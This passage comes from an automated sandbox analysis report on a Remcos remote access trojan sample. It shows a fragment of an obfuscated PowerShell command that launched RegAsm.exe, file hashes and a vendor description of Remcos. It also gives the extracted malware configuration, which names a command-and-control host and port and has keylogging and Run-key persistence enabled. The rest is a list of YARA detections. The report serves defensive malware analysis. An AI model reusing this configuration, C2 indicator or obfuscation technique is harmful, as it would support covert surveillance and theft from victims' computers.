{1}desativ ado{1}, {1 }desativad o{'+'1}, { 1}desativa do{1}, {1} RegAsm{1}, {1}desati vado{1}, { 1}d'+'esat ivado'+'{1 }));') -F [CHAr]36,[ CHAr]39) ) " MD5: A575A7610E5F003CC36DF39E07C4BA7D) - RegAsm.exe (PID: 3180 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 29 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 19 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |